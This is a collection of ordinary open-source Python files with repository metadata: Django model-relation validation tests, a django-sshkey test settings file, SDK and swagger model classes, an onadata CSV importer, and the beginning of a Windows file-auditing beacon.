"Reverse accessor for 'Model.first_m2m' clashes with reverse accessor for 'Model.second_m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.first_m2m' or 'Model.second_m2m'."
),
obj=Model._meta.get_field('first_m2m'),
id='fields.E304',
),
Error(
"Reverse accessor for 'Model.second_m2m' clashes with reverse accessor for 'Model.first_m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.second_m2m' or 'Model.first_m2m'."
),
obj=Model._meta.get_field('second_m2m'),
id='fields.E304',
),
])
def test_accessor_clash(self):
class Model(models.Model):
model_set = models.ManyToManyField("self", symmetrical=False)
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.model_set' clashes with field name 'Model.model_set'.",
hint=(
"Rename field 'Model.model_set', or add/change a related_name "
"argument to the definition for field 'Model.model_set'."
),
obj=Model._meta.get_field('model_set'),
id='fields.E302',
),
])
def test_reverse_query_name_clash(self):
class Model(models.Model):
model = models.ManyToManyField("self", symmetrical=False)
self.assertEqual(Model.check(), [
Error(
"Reverse query name for 'Model.model' clashes with field name 'Model.model'.",
hint=(
"Rename field 'Model.model', or add/change a related_name "
"argument to the definition for field 'Model.model'."
),
obj=Model._meta.get_field('model'),
id='fields.E303',
),
])
def test_clash_under_explicit_related_name(self):
class Model(models.Model):
clash = models.IntegerField()
m2m = models.ManyToManyField("self", symmetrical=False, related_name='clash')
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.m2m' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.m2m'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.m2m' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.m2m'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E303',
),
])
def test_valid_model(self):
class Model(models.Model):
first = models.ManyToManyField("self", symmetrical=False, related_name='first_accessor')
second = models.ManyToManyField("self", symmetrical=False, related_name='second_accessor')
self.assertEqual(Model.check(), [])
@isolate_apps('invalid_models_tests')
class SelfReferentialFKClashTests(SimpleTestCase):
def test_accessor_clash(self):
class Model(models.Model):
model_set = models.ForeignKey("Model", models.CASCADE)
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.model_set' clashes with field name 'Model.model_set'.",
hint=(
"Rename field 'Model.model_set', or add/change "
"a related_name argument to the definition "
"for field 'Model.model_set'."
),
obj=Model._meta.get_field('model_set'),
id='fields.E302',
),
])
def test_reverse_query_name_clash(self):
class Model(models.Model):
model = models.ForeignKey("Model", models.CASCADE)
self.assertEqual(Model.check(), [
Error(
"Reverse query name for 'Model.model' clashes with field name 'Model.model'.",
hint=(
"Rename field 'Model.model', or add/change a related_name "
"argument to the definition for field 'Model.model'."
),
obj=Model._meta.get_field('model'),
id='fields.E303',
),
])
def test_clash_under_explicit_related_name(self):
class Model(models.Model):
clash = models.CharField(max_length=10)
foreign = models.ForeignKey("Model", models.CASCADE, related_name='clash')
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.foreign' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.foreign'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.foreign' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.foreign'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E303',
),
])
@isolate_apps('invalid_models_tests')
class ComplexClashTests(SimpleTestCase):
# New tests should not be included here, because this is a single,
# self-contained sanity check, not a test of everything.
def test_complex_clash(self):
class Target(models.Model):
tgt_safe = models.CharField(max_length=10)
clash = models.CharField(max_length=10)
model = models.CharField(max_length=10)
clash1_set = models.CharField(max_length=10)
class Model(models.Model):
src_safe = models.CharField(max_length=10)
foreign_1 = models.ForeignKey(Target, models.CASCADE, related_name='id')
foreign_2 = models.ForeignKey(Target, models.CASCADE, related_name='src_safe')
m2m_1 = models.ManyToManyField(Target, related_name='id')
m2m_2 = models.ManyToManyField(Target, related_name='src_safe')
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.foreign_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.foreign_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.foreign_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.foreign_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E303',
),
Error(
"Reverse accessor for 'Model.foreign_1' clashes with reverse accessor for 'Model.m2m_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_1' or 'Model.m2m_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.foreign_1' clashes with reverse query name for 'Model.m2m_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_1' or 'Model.m2m_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.foreign_2' clashes with reverse accessor for 'Model.m2m_2'.",
hint=("Add or change a related_name argument "
"to the definition for 'Model.foreign_2' or 'Model.m2m_2'."),
obj=Model._meta.get_field('foreign_2'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.foreign_2' clashes with reverse query name for 'Model.m2m_2'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_2' or 'Model.m2m_2'."),
obj=Model._meta.get_field('foreign_2'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.m2m_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.m2m_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.m2m_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.m2m_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E303',
),
Error(
"Reverse accessor for 'Model.m2m_1' clashes with reverse accessor for 'Model.foreign_1'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_1' or 'Model.foreign_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.m2m_1' clashes with reverse query name for 'Model.foreign_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.m2m_1' or 'Model.foreign_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.m2m_2' clashes with reverse accessor for 'Model.foreign_2'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_2' or 'Model.foreign_2'."),
obj=Model._meta.get_field('m2m_2'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.m2m_2' clashes with reverse query name for 'Model.foreign_2'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_2' or 'Model.foreign_2'."),
obj=Model._meta.get_field('m2m_2'),
id='fields.E305',
),
])
def test_clash_parent_link(self):
class Parent(models.Model):
pass
class Child(Parent):
other_parent = models.OneToOneField(Parent, models.CASCADE)
errors = [
('fields.E304', 'accessor', 'parent_ptr', 'other_parent'),
('fields.E305', 'query name', 'parent_ptr', 'other_parent'),
('fields.E304', 'accessor', 'other_parent', 'parent_ptr'),
('fields.E305', 'query name', 'other_parent', 'parent_ptr'),
]
self.assertEqual(Child.check(), [
Error(
"Reverse %s for 'Child.%s' clashes with reverse %s for "
"'Child.%s'." % (attr, field_name, attr, clash_name),
hint=(
"Add or change a related_name argument to the definition "
"for 'Child.%s' or 'Child.%s'." % (field_name, clash_name)
),
obj=Child._meta.get_field(field_name),
id=error_id,
)
for error_id, attr, field_name, clash_name in errors
])
@isolate_apps('invalid_models_tests')
class M2mThroughFieldsTests(SimpleTestCase):
def test_m2m_field_argument_validation(self):
"""
ManyToManyField accepts the ``through_fields`` kwarg
only if an intermediary table is specified.
"""
class Fan(models.Model):
pass
with self.assertRaisesMessage(ValueError, 'Cannot specify through_fields without a through model'):
models.ManyToManyField(Fan, through_fields=('f1', 'f2'))
def test_invalid_order(self):
"""
Mixing up the order of link fields to ManyToManyField.through_fields
triggers validation errors.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(Fan, through='Invitation', through_fields=('invitee', 'event'))
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
self.assertEqual(field.check(from_model=Event), [
Error(
"'Invitation.invitee' is not a foreign key to 'Event'.",
hint="Did you mean one of the following foreign keys to 'Event': event?",
obj=field,
id='fields.E339',
),
Error(
"'Invitation.event' is not a foreign key to 'Fan'.",
hint="Did you mean one of the following foreign keys to 'Fan': invitee, inviter?",
obj=field,
id='fields.E339',
),
])
def test_invalid_field(self):
"""
Providing invalid field names to ManyToManyField.through_fields
triggers validation errors.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(
Fan,
through='Invitation',
through_fields=('invalid_field_1', 'invalid_field_2'),
)
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
self.assertEqual(field.check(from_model=Event), [
Error(
"The intermediary model 'invalid_models_tests.Invitation' has no field 'invalid_field_1'.",
hint="Did you mean one of the following foreign keys to 'Event': event?",
obj=field,
id='fields.E338',
),
Error(
"The intermediary model 'invalid_models_tests.Invitation' has no field 'invalid_field_2'.",
hint="Did you mean one of the following foreign keys to 'Fan': invitee, inviter?",
obj=field,
id='fields.E338',
),
])
def test_explicit_field_names(self):
"""
If ``through_fields`` kwarg is given, it must specify both
link fields of the intermediary table.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(Fan, through='Invitation', through_fields=(None, 'invitee'))
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
self.assertEqual(field.check(from_model=Event), [
Error(
"Field specifies 'through_fields' but does not provide the names "
"of the two link fields that should be used for the relation "
"through model 'invalid_models_tests.Invitation'.",
hint="Make sure you specify 'through_fields' as through_fields=('field1', 'field2')",
obj=field,
id='fields.E337',
),
])
def test_superset_foreign_object(self):
class Parent(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
c = models.PositiveIntegerField()
class Meta:
unique_together = (('a', 'b', 'c'),)
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
value = models.CharField(max_length=255)
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
related_name='children',
)
field = Child._meta.get_field('parent')
self.assertEqual(field.check(from_model=Child), [
Error(
"No subset of the fields 'a', 'b' on model 'Parent' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
),
])
def test_intersection_foreign_object(self):
class Parent(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
c = models.PositiveIntegerField()
d = models.PositiveIntegerField()
class Meta:
unique_together = (('a', 'b', 'c'),)
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
d = models.PositiveIntegerField()
value = models.CharField(max_length=255)
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b', 'd'),
to_fields=('a', 'b', 'd'),
related_name='children',
)
field = Child._meta.get_field('parent')
self.assertEqual(field.check(from_model=Child), [
Error(
"No subset of the fields 'a', 'b', 'd' on model 'Parent' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
),
])
| {
"content_hash": "41da2f058c67fd5b20a5a1646fb0bedf",
"timestamp": "",
"source": "github",
"line_count": 1499,
"max_line_length": 111,
"avg_line_length": 38.09873248832555,
"alnum_prop": 0.547995097180879,
"repo_name": "simonw/django",
"id": "786573672f38555576a75a47b13586f2c0ddd929",
"size": "57118",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/invalid_models_tests/test_relative_fields.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "85351"
},
{
"name": "HTML",
"bytes": "227641"
},
{
"name": "JavaScript",
"bytes": "258434"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "13501540"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "142"
}
],
"symlink_target": ""
} |
import getpass
import socket
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DEFAULT_FROM_EMAIL = '%s@%s' % (getpass.getuser(), socket.gethostname())
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'test.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/{{ docs_version }}/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/New_York'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '^t!$t$&%g!dzo!2ig40v1tgk95$ed^i&h7w(ydg&adkdkc8wvn'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'testproject.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
'templates',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.admindocs',
'south',
'django_sshkey',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| {
"content_hash": "5399e26ba0221794a092c8702013e364",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 122,
"avg_line_length": 34.22222222222222,
"alnum_prop": 0.6844919786096256,
"repo_name": "opennode/django-sshkey",
"id": "90e5eeee1ed91857dd5ccef02e5ce90b3caa16f9",
"size": "5280",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "testproject/settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "67020"
},
{
"name": "Shell",
"bytes": "8234"
}
],
"symlink_target": ""
} |
from __future__ import division, absolute_import, print_function
from future.builtins import super
from iris_sdk.models.base_resource import BaseResource
from iris_sdk.models.data.sip_peer import SipPeerData
from iris_sdk.models.data.address import Address
from iris_sdk.models.data.calling_name import CallingName
from iris_sdk.models.data.hosts import Hosts
from iris_sdk.models.data.termination_hosts import TerminationHosts
from iris_sdk.models.maps.sip_peer import SipPeerMap
from iris_sdk.models.movetns import Movetns
from iris_sdk.models.sip_peer_tns import SipPeerTns
from iris_sdk.models.sip_peer_totaltns import SipPeerTotaltns
XPATH_SIP_PEER = "/{}"
class SipPeer(BaseResource, SipPeerData):
"""Site SIP peer"""
_xpath = XPATH_SIP_PEER
@property
def id(self):
return self.peer_id
@id.setter
def id(self, id):
self.peer_id = id
@property
def movetns(self):
return self._movetns
@property
def tns(self):
return self._tns
@property
def totaltns(self):
return self._totaltns
def __init__(self, parent=None, client=None):
super().__init__(parent, client)
SipPeerData.__init__(self)
self._movetns = Movetns(self, client)
self._tns = SipPeerTns(self, client)
self._totaltns = SipPeerTotaltns(self, client)
def get(self, id=None):
return self._get_data(id) | {
"content_hash": "0ee316c2c879bdbe14fe42842746122e",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 67,
"avg_line_length": 28.3,
"alnum_prop": 0.6946996466431096,
"repo_name": "scottbarstow/iris-python",
"id": "6ced3eb946a71372ab2b19fa5912a7af06e2fc14",
"size": "1438",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "iris_sdk/models/sip_peer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "308732"
}
],
"symlink_target": ""
} |
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.21
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class Player(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, url=None, manifest=None):
"""
Player - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'url': 'str',
'manifest': 'object'
}
self.attribute_map = {
'url': 'url',
'manifest': 'manifest'
}
self._url = url
self._manifest = manifest
@property
def url(self):
"""
Gets the url of this Player.
:return: The url of this Player.
:rtype: str
"""
return self._url
@url.setter
def url(self, url):
"""
Sets the url of this Player.
:param url: The url of this Player.
:type: str
"""
self._url = url
@property
def manifest(self):
"""
Gets the manifest of this Player.
:return: The manifest of this Player.
:rtype: object
"""
return self._manifest
@manifest.setter
def manifest(self, manifest):
"""
Sets the manifest of this Player.
:param manifest: The manifest of this Player.
:type: object
"""
self._manifest = manifest
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| {
"content_hash": "3e0c190254cf0878e8f11857df9b3433",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 77,
"avg_line_length": 24.059701492537314,
"alnum_prop": 0.49503722084367247,
"repo_name": "kinow-io/kinow-python-sdk",
"id": "c5f4c9cc2eb3565c41785b5ae96db88b040f2791",
"size": "3241",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kinow_client/models/player.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4659182"
},
{
"name": "Shell",
"bytes": "1666"
}
],
"symlink_target": ""
} |
import unicodecsv as ucsv
import uuid
import json
import cStringIO
from datetime import datetime
from django.contrib.auth.models import User
from onadata.libs.utils.logger_tools import dict2xml, safe_create_instance
from onadata.apps.logger.models import Instance
def get_submission_meta_dict(xform, instance_id):
"""Generates metadata for our submission
Checks if `instance_id` belongs to an existing submission.
If it does, it's considered an edit and its uuid gets deprecated.
In either case, a new one is generated and assigned.
:param onadata.apps.logger.models.XForm xform: The submission's XForm.
:param string instance_id: The submission/instance `uuid`.
:return: The metadata dict
:rtype: dict
"""
uuid_arg = 'uuid:{}'.format(uuid.uuid4())
meta = {'instanceID': uuid_arg}
update = 0
if xform.instances.filter(uuid=instance_id).count() > 0:
uuid_arg = 'uuid:{}'.format(uuid.uuid4())
meta.update({'instanceID': uuid_arg,
'deprecatedID': 'uuid:{}'.format(instance_id)})
update += 1
return [meta, update]
def dict2xmlsubmission(submission_dict, xform, instance_id, submission_date):
"""Creates and xml submission from an appropriate dict (& other data)
:param dict submission_dict: A dict containing form submission data.
:param onadata.apps.logger.models.XForm xfrom: The submission's XForm.
:param string instance_id: The submission/instance `uuid`.
:param string submission_date: An isoformatted datetime string.
:return: An xml submission string
:rtype: string
"""
return (u'<?xml version="1.0" ?>'
'<{0} id="{1}" instanceID="uuid:{2}" submissionDate="{3}" '
'xmlns="http://opendatakit.org/submissions">{4}'
'</{0}>'.format(
json.loads(xform.json).get('name', xform.id_string),
xform.id_string, instance_id, submission_date,
dict2xml(submission_dict).replace('\n', '')))
def submit_csv(username, xform, csv_file):
""" Imports CSV data to an existing form
Takes a csv formatted file or string containing rows of submission/instance
and converts those to xml submissions and finally submits them by calling
:py:func:`onadata.libs.utils.logger_tools.safe_create_instance`
:param str username: the subission user
:param onadata.apps.logger.models.XForm xfrom: The submission's XForm.
:param (str or file): A CSV formatted file with submission rows.
:return: If sucessful, a dict with import summary else dict with error str.
:rtype: Dict
"""
if isinstance(csv_file, (str, unicode)):
csv_file = cStringIO.StringIO(csv_file)
elif csv_file is None or not hasattr(csv_file, 'read'):
return {'error': (u'Invalid param type for `csv_file`. '
'Expected file or String '
'got {} instead.'.format(type(csv_file).__name__))}
csv_reader = ucsv.DictReader(csv_file)
rollback_uuids = []
submission_time = datetime.utcnow().isoformat()
ona_uuid = {'formhub': {'uuid': xform.uuid}}
error = None
additions = inserts = 0
for row in csv_reader:
# fetch submission uuid before purging row metadata
row_uuid = row.get('_uuid')
submitted_by = row.get('_submitted_by')
submission_date = row.get('_submission_time', submission_time)
for key in row.keys(): # seems faster than a comprehension
# remove metadata (keys starting with '_')
if key.startswith('_'):
del row[key]
# process nested data e.g x[formhub/uuid] => x[formhub][uuid]
if r'/' in key:
p, c = key.split('/')
row[p] = {c: row[key]}
del row[key]
# inject our form's uuid into the submission
row.update(ona_uuid)
old_meta = row.get('meta', {})
new_meta, update = get_submission_meta_dict(xform, row_uuid)
inserts += update
old_meta.update(new_meta)
row.update({'meta': old_meta})
row_uuid = row.get('meta').get('instanceID')
rollback_uuids.append(row_uuid.replace('uuid:', ''))
xml_file = cStringIO.StringIO(dict2xmlsubmission(row, xform, row_uuid,
submission_date))
try:
error, instance = safe_create_instance(username, xml_file, [],
xform.uuid, None)
except ValueError as e:
error = e
if error:
Instance.objects.filter(uuid__in=rollback_uuids,
xform=xform).delete()
return {'error': str(error)}
else:
additions += 1
users = User.objects.filter(
username=submitted_by) if submitted_by else []
if users:
instance.user = users[0]
instance.save()
return {'additions': additions - inserts, 'updates': inserts}
| {
"content_hash": "62fb0756d6fd1541e6d5fec650a11968",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 79,
"avg_line_length": 38.097744360902254,
"alnum_prop": 0.6050917702782712,
"repo_name": "awemulya/fieldsight-kobocat",
"id": "3c5a7a487d035a4732f389dfda47b6be81f14428",
"size": "5067",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "onadata/libs/utils/csv_import.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "70153"
},
{
"name": "Dockerfile",
"bytes": "2462"
},
{
"name": "HTML",
"bytes": "1488442"
},
{
"name": "JavaScript",
"bytes": "674757"
},
{
"name": "Makefile",
"bytes": "2286"
},
{
"name": "Python",
"bytes": "5340355"
},
{
"name": "Shell",
"bytes": "16493"
}
],
"symlink_target": ""
} |
#win_notify
'''
This will setup your computer to enable auditing for specified folders inputted into a yaml file. It will
then scan the event log for changes to those folders every 5 minutes and report when it finds one.
'''
from __future__ import absolute_import
import collections
import datetime
import fnmatch
import logging
import threading
import os
import glob
import yaml
import salt.ext.six
import salt.loader
log = logging.getLogger(__name__)
DEFAULT_MASK = ['ExecuteFile', 'Write', 'Delete', 'DeleteSubdirectoriesAndFiles', 'ChangePermissions',
'TakeOwnership'] #ExecuteFile Is really chatty
DEFAULT_TYPE = 'all'
__virtualname__ = 'pulsar'
__version__ = 'v2016.10.3'
CONFIG = None
CONFIG_STALENESS = 0
def __virtual__():
if not salt.utils.is_windows():
return False, 'This module only works on windows'
return __virtualname__
def beacon(config):
'''
Watch the configured files
Example Config
.. code-block:: yaml
beacons:
win_notify:
/path/to/file/or/dir:
mask:
- Write
- ExecuteFile
- Delete
- DeleteSubdirectoriesAndFiles
wtype: all
recurse: True
exclude:
- /path/to/file/or/dir/exclude1
- /path/to/*/file/or/dir/*/exclude2
The mask list can contain the following events (the default mask is create, delete, and modify):
1. ExecuteFile - Traverse folder / execute file
2. ReadData - List folder / read data
3. ReadAttributes - Read attributes of object
4. ReadExtendedAttributes - Read extended attributes of object
5. CreateFiles - Create files / write data
6. AppendData - Create folders / append data
7. WriteAttributes - Write attributes of object
8. WriteExtendedAttributes - Write extended attributes of object
9. DeleteSubdirectoriesAndFiles - Delete subfolders and files
10. Delete - Delete an object
11. ReadPermissions - Read Permissions of an object
12. ChangePermissions - Change permissions of an object
13. TakeOwnership - Take ownership of an object
14. Write - Combination of 5, 6, 7, 8
15. Read - Combination of 2, 3, 4, 11
16. ReadAndExecute - Combination of 1, 2, 3, 4, 11
17. Modify - Combination of 1, 2, 3, 4, 5, 6, 7, 8, 10, 11
*If you want to monitor everything (A.K.A. Full Control) then you want options 9, 12, 13, 17
recurse:
Recursively watch files in the directory
wtype:
Type of Audit to watch for:
1. Success - Only report successful attempts
2. Fail - Only report failed attempts
3. All - Report both Success and Fail
exclude:
Exclude directories or files from triggering events in the watched directory
:return:
'''
global CONFIG_STALENESS
global CONFIG
if config.get('verbose'):
log.debug('Pulsar beacon called.')
log.debug('Pulsar beacon config from pillar:\n{0}'.format(config))
ret = []
sys_check = 0
# Get config(s) from filesystem if we don't have them already
if CONFIG and CONFIG_STALENESS < config.get('refresh_frequency', 60):
CONFIG_STALENESS += 1
CONFIG.update(config)
CONFIG['verbose'] = config.get('verbose')
config = CONFIG
else:
if config.get('verbose'):
log.debug('No cached config found for pulsar, retrieving fresh from disk.')
new_config = config
if isinstance(config.get('paths'), list):
for path in config['paths']:
if 'salt://' in path:
log.error('Path {0} is not an absolute path. Please use a '
'scheduled cp.cache_file job to deliver the '
'config to the minion, then provide the '
'absolute path to the cached file on the minion '
'in the beacon config.'.format(path))
continue
if os.path.isfile(path):
with open(path, 'r') as f:
new_config = _dict_update(new_config,
yaml.safe_load(f),
recursive_update=True,
merge_lists=True)
else:
log.error('Path {0} does not exist or is not a file'.format(path))
else:
log.error('Pulsar beacon \'paths\' data improperly formatted. Should be list of paths')
new_config.update(config)
config = new_config
CONFIG_STALENESS = 0
CONFIG = config
if config.get('verbose'):
log.debug('Pulsar beacon config (compiled from config list):\n{0}'.format(config))
# Validate Global Auditing with Auditpol
global_check = __salt__['cmd.run']('auditpol /get /category:"Object Access" /r | find "File System"',
python_shell=True)
if global_check:
if not 'Success and Failure' in global_check:
